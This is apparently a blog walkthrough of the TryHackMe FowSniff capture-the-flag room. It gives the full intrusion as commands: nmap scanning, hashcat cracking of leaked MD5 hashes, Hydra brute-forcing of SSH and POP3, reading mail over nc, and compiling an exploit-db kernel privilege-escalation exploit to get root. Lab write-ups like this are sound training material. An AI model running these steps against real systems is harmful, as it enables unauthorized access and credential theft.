Written by Simon

Walkthrough for the TryHackMe FowSniff CTF

This room is available on TryHackMe at https://tryhackme.com/room/ctf

Reconnaissance

First thing to do, is always do a port scan of all 65535 ports of the server to see what is running on the server.

sudo nmap -sS -p- -T4 x.x.x.x -vv
  • -sS for Syn/Stealth scan
  • -p- to scan all 65535 ports
  • -T4 for a fast aggressive and noisy scan
  • -vv for very verbose so we can follow the progress of the scan

Which give us the following

  • PORT STATE SERVICE REASON
  • 22/tcp open ssh syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63
  • 110/tcp open pop3 syn-ack ttl 63
  • 143/tcp open imap syn-ack ttl 63

Now lets find out a little more about those specific ports.

sudo nmap -sS -sV -p22,80,110,143 -T4 x.x.x.x -vv
  • -sS for Syn/Stealth scan
  • -sV to get the version of the software running on the ports
  • -p22,80,110,143 to only scan the ports we previously found
  • -T4 for a fast aggressive and noisy scan
  • -vv for very verbose so we can follow the progress of the scan

Which gives us the following:

  • PORT STATE SERVICE REASON VERSION
  • 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • 110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
  • 143/tcp open imap syn-ack ttl 63 Dovecot imapd
  • Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we know its running a webserver, lets see what the website looks like when we visit http://x.x.x.x

Well, that’s not a good sign, but let see what else we can find

dirb http://10.10.128.30 /usr/share/dirb/wordlists/common.txt

The only possibly interesting find is the robots.txt, and visiting http://x.x.x.x/robots.txt doesn’t give us anything. So back to the website and it says that the https://twitter.com/fowsniffcorp?lang=en Twitter handle has been hijacked and they may release sensitive information so lets see if they did

And it looks like they have released all the passwords on Pastebin – available at https://pastebin.com/NrAqVeeX

Password Cracking

Save the contents to a text file somewhere, then remove the @fowsniff from the file using sed, grep, excel, or manually using text editor of your choice.

The paste mentions that the passwords are only hashed with the MD5 method (Have a look at https://en.wikipedia.org/wiki/MD5 for more information). So we can use hashcat to hopefully recover some passwords.

hashcat -m 0 fowsniff.txt /usr/share/wordlists/rockyou.txt
  • -m 0 tells Hashcat to use MD5
  • fowstiff.txt is where I saved the hashes
  • /usr/share/wordlists/rockyou.txt is a favorite possible password list

And a few minutes later, we should have 8 of the 9 passwords. Looks like they don’t take password security very seriously.

Remote Attacks

We know that the server runs SSH, so lets see if any of the passwords we cracked work. Hydra is the perfect tool for this.

hydra -L fowsniff-users.txt -P fowsniff-pass.txt x.x.x.x ssh

  • -L fowsniff-users.txt is a list of users from the hash file to try

  • -P fowshiff-pass.txt is a list of passwords we got from the hashfile to try

  • ssh tells hydra to try login with ssh

  • Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-26 08:44:24

  • [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce

  • the tasks: use -t 4

  • [DATA] max 16 tasks per 1 server, overall 16 tasks, 72 login tries (l:9/p:8), ~5 tries per task

  • [DATA] attacking ssh://10.10.19.176:22/

  • 1 of 1 target completed, 0 valid password found

  • Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-26 08:44:46

And none of the passwords work for SSH

But we know their are open ports for POP3, so lets see if we can login there and if we can, if there is any useful information in an email. So back to hydra.

hydra -L fowsniff-users.txt -P fowsniff-pass.txt x.x.x.x pop3

And we have a winner, user seina hasn’t changed their password.

Email Info Extraction

We can login to the POP3 server with the login and password using telnet or nc. nc is a better choice as telnet isn’t installed by default.

ElectricToolBox has a list of useful command to run from the console to list and read emails on a POP3 server – https://electrictoolbox.com/pop3-commands/

nc x.x.x.x 110

And what we find is interesting

Exploitation

Let’s login to the server with those details

ssh user@x.x.x.x

And we are in.

sudo -l

sudo doesn’t give us anything to run with root privilege’s, so lets learn a little bit more about the server

uname -a

And we see that this is an old version of Ubuntu. Let’s see if ExploitDB has anything we can use

searchploit linux kernel 4.4.0

The Local Privileges Escalation looks like it might work.

Let’s copy the .c file to our home directory

cp /usr/share/exploitdb/exploits/linux/local/44298.c /home/kali

and now lets compile it

gcc 44298.c

Which now gives us a file named a.out – Now lets transfer it to the victim machine. You can use nc to do this, but I am lazy and use filezilla (sudo apt-get install filezilla if its not installed).

After that, run the command

./a.out

And it will drop you into a rootshell. You can test this by running the command

whoami

Then quickly change directory to /root/ and find the file flag.txt

And you are done. Congratulations on getting the root flag.